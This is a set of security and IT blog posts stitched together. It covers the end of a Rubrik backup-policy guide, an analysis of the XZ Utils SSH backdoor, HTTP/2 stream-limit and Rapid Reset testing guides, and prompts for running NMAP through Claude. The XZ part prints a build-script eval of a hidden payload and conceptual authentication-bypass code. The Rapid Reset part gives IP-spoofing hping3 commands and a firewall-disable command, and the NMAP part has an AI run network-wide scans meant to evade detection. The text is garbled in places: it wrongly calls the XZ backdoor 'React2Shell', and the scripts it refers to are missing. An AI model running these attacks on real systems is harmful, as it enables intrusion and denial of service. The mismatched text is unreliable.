Gold: 8 hour snapshots, 14 day local retention, asynchronous replication, 3 year archive
Silver: Daily snapshots, 7 day local retention, no replication, 1 year archive
Bronze: Daily snapshots, 7 day local retention, no replication, 90 day archive
This pattern works well when criticality maps cleanly to workload types, but creates governance overhead when applications span tiers.
8.3.2 Pattern 2: Tiered by Recovery Requirements
Align SLA Domains to recovery time objectives rather than business criticality:
Instant Recovery: Maximum local retention, synchronous replication, Live Mount always available
Same Day Recovery: 14 day local retention, asynchronous replication
Next Day Recovery: 7 day local retention, archive first strategy
This pattern acknowledges that “critical” and “needs instant recovery” aren’t always the same thing. A compliance archive might be business critical but tolerate 24 hour recovery times.
8.3.3 Pattern 3: Application Aligned
Create SLA Domains per major application or database platform:
SQL Server Production
SQL Server Non Production
Oracle Production
VMware Infrastructure
File Shares
This pattern simplifies troubleshooting and reporting but can lead to policy sprawl as the estate grows.
8.4 Log Backup Policies: The Hidden Complexity
For SQL Server and Oracle, snapshot frequency alone doesn’t tell the full story. Transaction log backups between snapshots determine actual RPO.
Rubrik supports log backup frequencies down to 1 minute for SQL Server. The trade offs:
Aggressive Log Backup (1-5 minute frequency):
Sub 5 minute RPO
Higher metadata overhead on Rubrik cluster
More objects to manage during restore
Longer Live Mount preparation time (more logs to replay)
Conservative Log Backup (15-60 minute frequency):
Acceptable RPO for most workloads
Lower operational overhead
Faster Live Mount operations
Simpler troubleshooting
Gotcha: Log backup frequency creates a hidden I/O load on the source database. A 1 minute log backup interval on a high transaction database generates constant log backup traffic. For already I/O constrained databases, this can become the straw that breaks performance.
Recommendation: Match log backup frequency to actual RPO requirements, not aspirational ones. If the business can tolerate 15 minutes of data loss, don’t configure 1 minute log backups just because you can.
8.5 Replication Topology Gotchas
Replication seems straightforward, copy snapshots to another cluster, but the implementation details matter.
8.5.1 Gotcha 1: Replication Lag Under Load
Asynchronous replication means the target cluster is always behind the source. During high backup activity (month end processing, batch loads), this lag can extend to hours. If a disaster occurs during this window, you lose more data than your SLA suggests.
Monitor replication lag as an operational metric, not just a capacity planning number.
8.5.2 Gotcha 2: Bandwidth Contention with Production Traffic
Replication competes for the same network paths as production traffic. If your backup replication saturates a WAN link, production application performance degrades.
Either implement QoS policies to protect production traffic, or schedule replication during low utilisation windows. Rubrik supports replication scheduling, but the default is “as fast as possible,” which isn’t always appropriate.
8.5.3 Gotcha 3: Cascaded Replication Complexity
For multi site architectures, you might configure Site A → Site B → Site C replication. Each hop adds latency and failure modes. A Site B outage breaks the chain to Site C.
Consider whether hub and spoke (Site A replicates independently to both B and C) better matches your DR requirements, despite the additional bandwidth consumption.
8.6 Archive Tier Selection: Retrieval Time Matters
Object storage isn’t monolithic. The choice between storage classes has direct recovery implications.
Storage Class
Typical Retrieval Time
Use Case
S3 Standard / Azure Hot
Immediate
Frequently accessed archives
S3 Standard-IA / Azure Cool
Immediate (higher retrieval cost)
Infrequent but urgent access
S3 Glacier Instant Retrieval
Milliseconds
Compliance archives with occasional audit access
S3 Glacier Flexible Retrieval
1-12 hours
Long-term retention with rare access
S3 Glacier Deep Archive
12-48 hours
Legal hold, never access unless subpoenaed
Gotcha: Rubrik’s archive policy assigns snapshots to a single storage class. If your retention spans 7 years, all 7 years of archives pay the same storage rate, even though year 1 archives are accessed far more frequently than year 7 archives.
Recommendation: Consider tiered archive policies—recent archives to Standard-IA, aged archives to Glacier. This requires multiple SLA Domains and careful lifecycle management, but the cost savings compound significantly at scale.
8.7 Policy Assignment Gotchas
8.7.1 Gotcha 1: Inheritance and Override Conflicts
Rubrik supports hierarchical policy assignment (cluster → host → database). When policies conflict, the resolution logic isn’t always intuitive. A database with an explicit SLA assignment won’t inherit changes made to its parent host’s policy.
Document your policy hierarchy explicitly. During audits, the question “what policy actually applies to this database?” should have an immediate, verifiable answer.
8.7.2 Gotcha 2: Pre script and Post script Failures
Custom scripts for application quiescing or notification can fail, and failure handling varies. A pre script failure might skip the backup entirely (safe but creates a gap) or proceed without proper quiescing (dangerous).
Test script failure modes explicitly. Know what happens when your notification webhook is unreachable or your custom quiesce script times out.
8.7.3 Gotcha 3: Time Zone Confusion
Rubrik displays times in the cluster’s configured time zone, but SLA schedules operate in UTC unless explicitly configured otherwise. An “8 PM backup” might run at midnight local time if the time zone mapping is wrong.
Verify backup execution times after policy configuration, don’t trust the schedule display alone.
8.8 Testing Your Restore Policies
Policy design is theoretical until tested. The following tests should be regular operational practice:
Live Mount Validation: Mount a backup from local retention and verify application functionality. This proves both backup integrity and Live Mount operational capability.
Archive Retrieval Test: Retrieve a backup from archive tier and time the operation. Compare actual retrieval time against SLA commitments.
Replication Failover Test: Perform a Live Mount from the replication target, not the source cluster. This validates that DR actually works, not just that replication is running.
Point in Time Recovery Test: For databases with log backup enabled, recover to a specific timestamp between snapshots. This validates that log chain integrity is maintained.
Concurrent Restore Test: Simulate a ransomware scenario by triggering multiple simultaneous restores. Measure whether your infrastructure can sustain the required parallelism.
8.9 Policy Review Triggers
SLA Domains shouldn’t be “set and forget.” Trigger policy reviews when:
Application criticality changes (promotion to production, decommissioning)
Recovery requirements change (new compliance mandates, audit findings)
Infrastructure changes (new replication targets, storage tier availability)
Performance issues emerge (backup windows exceeded, replication lag growing)
The goal is proactive policy maintenance, not reactive incident response when a restore takes longer than expected.
9. Ransomware: Where Architecture Is Exposed
9.1 The Restore Storm Problem
After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.
Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.
Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a data breach into a network outage.
10. SaaS vs Appliance: This Is a Network Decision
Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.
The difference is bandwidth reality.
On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.
Hybrid estates usually require both.
11. Why Rubrik in the Cloud?
Cloud providers offer native backup primitives. These are necessary but insufficient. They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics. Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.
11.1 Should You Protect Your AWS Root and Crypto Accounts?
Yes, because losing the control plane is worse than losing data.
Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.
12. Backup Meets Security (Finally)
Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking.cThis answers the most dangerous question in recovery: which backup is actually safe to restore? Most platforms cannot answer this with confidence.
13. VMware First Class Citizen, Physical Hosts Still Lag
Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.
The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.
14. When Rubrik Is Not the Right Tool
Rubrik is not universal.
It is less optimal when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.
Rubrik’s value emerges at scale, under pressure, and during failure.
15. Conclusion: Boredom Is Success
Backups should be boring. Restores should be quiet. Executives should never know the platform exists.
The only time backups become exciting is when they fail, and that excitement is almost always lethal.
Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.
CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.
This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.
Table of Contents
What Makes This Vulnerability Exceptionally Dangerous
The Anatomy of the Attack
Technical Implementation of the Backdoor
Detection Methodology
Remote Scanning Tools and Techniques
Remediation Steps
Lessons for the Security Community
What Makes This Vulnerability Exceptionally Dangerous
Supply Chain Compromise at Scale
Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.
This attack vector is particularly insidious for several reasons:
Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.
Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.
Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.
The Perfect Backdoor
What makes this backdoor particularly dangerous is its technical sophistication:
Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.
Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.
Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.
Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.
Timeline and Near Miss
The timeline of this attack demonstrates how close the security community came to widespread compromise:
Late 2021: “Jia Tan” begins contributing to XZ Utils project
2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin
February 2024: Backdoored versions 5.6.0 and 5.6.1 released
March 29, 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor
March 30, 2024: Public disclosure and emergency response
Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.
The Anatomy of the Attack
Multi-Stage Social Engineering
The attack began long before any malicious code was written. The attacker needed to:
Establish Identity: Create a credible online persona with consistent activity patterns
Build Reputation: Make legitimate contributions to build trust
Apply Pressure: Create artificial urgency around maintainer succession
Gain Commit Access: Become a co-maintainer with direct repository access
This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas to add social pressure on the sole maintainer, suggesting burnout and need for help.
Code Insertion Strategy
The malicious code was inserted through several mechanisms:
Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.
Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.
Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.
Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.
Technical Implementation of the Backdoor
How XZ Utils Connects to SSH
To understand the backdoor, we must first understand an unexpected dependency chain:
On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.
The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.
Stage 1: Build Time Injection
The attack begins during the XZ Utils build process:
# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
# Extract and execute embedded script from "test file"
eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi
The build script would:
Detect specific binary test files in the source tree
Decompress these files to extract shell commands
Execute the extracted commands during the build process
Modify the liblzma source code to include backdoor hooks
These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.
Stage 2: Runtime Hooking
Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:
// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
// Check if signature contains magic bytes
if (signature_contains_trigger(signature)) {
// Extract and execute payload from certificate
char *command = decode_payload(signature);
// Execute with sshd privileges (typically root)
system(command);
// Return success to bypass authentication
return 1;
}
// Otherwise, perform normal verification
return original_rsa_verify(signature, key);
}
The backdoor:
Intercepts all SSH authentication attempts
Examines the RSA signature for special markers
If triggered, extracts commands from the certificate
Executes commands with root privileges
Returns success to complete the “authentication”
From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.
Why Traditional Detection Fails
The backdoor was designed to evade common security measures:
No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.
No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.
Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.
Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.
Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.
Detection Methodology
Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.
Timing Based Detection
The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.
Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²
Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²
The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.
Banner Analysis
While not definitive, certain configurations increase vulnerability likelihood:
# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version
Debian and Ubuntu were the primary targets because:
They quickly incorporated the backdoored versions into testing repositories
They use systemd, creating the sshd → libsystemd → liblzma dependency chain
They enable systemd notification in sshd by default
Library Linkage Analysis
On accessible systems, verifying SSH’s library dependencies provides definitive evidence:
For integration with existing security scanning workflows, an Nmap NSE script provides standardized vulnerability reporting. Nmap Scripting Engine (NSE) scripts are written in Lua and leverage Nmap’s network scanning capabilities. Understanding NSE Script Structure NMAP NSE scripts follow a specific structure that integrates with Nmap’s scanning engine. Create the React2Shell detection script with:
# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt
# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP
# Or shutdown SSH entirely
systemctl stop ssh
Step 4: Remediation
For systems with the vulnerable version but no evidence of compromise:
# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils
# Verify the new version
xz --version
# Should show 5.4.x or 5.5.x
# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3
# Restart SSH to unload old library
systemctl restart ssh
# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1
# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com
# Monitor for a period
tail -f /var/log/auth.log
System Hardening Post Remediation
After removing the backdoor, implement additional protections:
This attack highlights critical vulnerabilities in the open source ecosystem:
Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.
Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.
Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.
Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.
Detection Strategy Evolution
The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:
Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.
Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.
Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.
Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.
Infrastructure Recommendations
Organizations should implement:
Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.
Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.
Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.
Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.
The Role of Timing in Security
This attack demonstrates the importance of performance analysis in security:
Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.
Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.
Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.
Conclusion
CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.
The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.
The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.
As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.
The React2Shell backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.
Additional Resources
Technical References
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094
Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27
Detection Tools
The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.
These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.
Indicators of Compromise
XZ Utils version 5.6.0 or 5.6.1 installed
SSH daemon (sshd) linking to liblzma library
Unusual SSH authentication timing (>800ms for auth probe)
High variance in SSH connection establishment times
Recent XZ Utils updates from February or March 2024
Debian or Ubuntu systems with systemd enabled SSH
OpenSSH versions 9.6 or 9.7 on Debian-based distributions
Recommended Actions
Scan all SSH-accessible systems for timing anomalies
Verify XZ Utils versions across your infrastructure
Review SSH authentication logs for suspicious patterns
Implement continuous monitoring for behavioral anomalies
Establish performance baselines for critical services
Develop incident response procedures for supply chain compromises
Consider additional SSH hardening measures
Review and audit all open source dependencies in your environment
Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.
This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.
2. Why Test Stream Limits?
The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:
Security validation: Confirms your server enforces reasonable stream limits
Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
Performance tuning: Helps optimize the balance between throughput and resource consumption
Attack surface assessment: Identifies if servers accept dangerously high stream counts
3. Understanding HTTP/2 Stream Limits
When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:
Testing HTTP/2 Stream Limits:
Target: example.com:443
Max streams to test: 200
Batch size: 10
============================================================
Server advertised limit: 128 concurrent streams
Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
WARNING: 5 stream(s) were reset by server
Stream limit enforcement detected
============================================================
STREAM LIMIT TEST RESULTS
============================================================
Server Configuration:
Advertised max streams: 128
Test Statistics:
Successful stream opens: 130
Failed stream opens: 0
Streams reset by server: 5
Actual max achieved: 125
Test duration: 3.45s
Enforcement:
Stream limit enforcement: DETECTED
============================================================
ASSESSMENT
============================================================
Advertised limit (128) is within recommended range
Server actively enforces stream limits
Stream limit protection is working correctly
============================================================
Advertised max streams: Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved: 200
Stream limit enforcement: NOT DETECTED
Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.
# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com
# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
--host example.com \
--cidr 192.168.1.0/24 \
--packets 1000
# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com
11. Security Best Practices
11.1. Configuration Guidelines
Set explicit limits: Never rely on default values
Use conservative values: 100-128 streams is the recommended range
Monitor enforcement: Regularly verify that limits are actually being enforced
Document settings: Maintain records of your stream limit configuration
Test after changes: Always test after configuration modifications
11.2. Defense in Depth
Stream limits should be one layer in a comprehensive security strategy:
Stream limits: Prevent excessive concurrent streams per connection
Connection limits: Limit total connections per IP address
Request rate limiting: Throttle requests per second
Resource quotas: Set memory and CPU limits
WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation
11.3. Regular Testing Schedule
Establish a regular testing schedule:
Weekly: Automated basic stream limit tests
Monthly: Comprehensive security testing including Rapid Reset
After changes: Always test after configuration or infrastructure changes
Quarterly: Full security audit including penetration testing
12. Troubleshooting
12.1. Common Errors
Error: “SSL: CERTIFICATE_VERIFY_FAILED”
This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).
# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com
# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com
# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com
14. Conclusion
Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:
Verify that your server advertises appropriate stream limits
Confirm that advertised limits are actually enforced
Identify misconfigurations before they can be exploited
Tune performance while maintaining security
Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.
This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.
In August 2023, a critical zero day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE 2023 44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.
Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.
What is HTTP/2 Rapid Reset?
The HTTP/2 Protocol Foundation
HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.
The Vulnerability Mechanism
The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:
Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received
An attacker can:
Open an HTTP/2 connection
Send thousands of requests with incrementing stream IDs
Immediately cancel each request with RST_STREAM frames
Repeat this cycle at extremely high rates
The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
Why It’s So Effective
Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:
Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
Connection reuse: Attackers multiplex thousands of streams over relatively few connections
Amplification: Each cheap client operation triggers expensive server side processing
How to Guard Against HTTP/2 Rapid Reset
1. Update Your Software Stack
Immediate Priority: Ensure all HTTP/2 capable components are patched:
Web Servers:
Nginx 1.25.2+ or 1.24.1+
Apache HTTP Server 2.4.58+
Caddy 2.7.4+
LiteSpeed 6.0.12+
Reverse Proxies and Load Balancers:
HAProxy 2.8.2+ or 2.6.15+
Envoy 1.27.0+
Traefik 2.10.5+
CDN and Cloud Services:
CloudFlare (auto patched August 2023)
AWS ALB/CloudFront (patched)
Azure Front Door (patched)
Google Cloud Load Balancer (patched)
Application Servers:
Tomcat 10.1.13+, 9.0.80+
Jetty 12.0.1+, 11.0.16+, 10.0.16+
Node.js 20.8.0+, 18.18.0+
2. Implement Stream Limits
Configure strict limits on HTTP/2 stream behavior:
Note: This reduces performance benefits but eliminates the vulnerability.
Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS
Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.
# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off
# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c
# Active connections count
netstat -an | grep ESTABLISHED | wc -l
# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l
# System resources
top -l 1 | head -10
Understanding IP Spoofing with hping3
How It Works
hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
Network Requirements
For IP spoofing to work effectively:
Local networks: Works best on LANs you control
Direct routing: Requires direct layer 2 access
No NAT interference: NAT devices may rewrite source addresses
Router configuration: Some routers filter spoofed packets (BCP 38)
Testing Without Spoofing
If IP spoofing is not working in your environment:
The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.
Remember that security is an ongoing process. Regularly:
Update your web server and proxy software
Review and adjust HTTP/2 configuration limits
Monitor for unusual traffic patterns
Test your defenses against emerging threats
By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.
This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.
NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.
In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.
Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.
Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.
What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.
Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.
What this does: Combines multiple detection techniques for maximum information.
Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.
What this does: Comprehensive SSL/TLS security assessment.
I need a complete security assessment of webapp.example-target.com. Please:
1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice
Use timing template T3 (normal) to avoid overwhelming the target.
What Claude will do:
Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:
Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:
1. Discover all live hosts in the IP range
2. For each live host, identify:
- Operating system
- All open ports (full 65535 range)
- Service versions
- Potential vulnerabilities
3. Map the network topology and identify:
- Firewalls and filtering
- DMZ hosts vs internal hosts
- Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
- Open DNS resolvers
- Open mail relays
- Unauthenticated database access
- Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary
Use slow timing (T2) to minimize detection risk and avoid false positives.
# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24
# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24
# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24
# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24
# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24
# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]
Learning Outcomes:
Large-scale network scanning strategies
How to handle and analyze results from multiple hosts
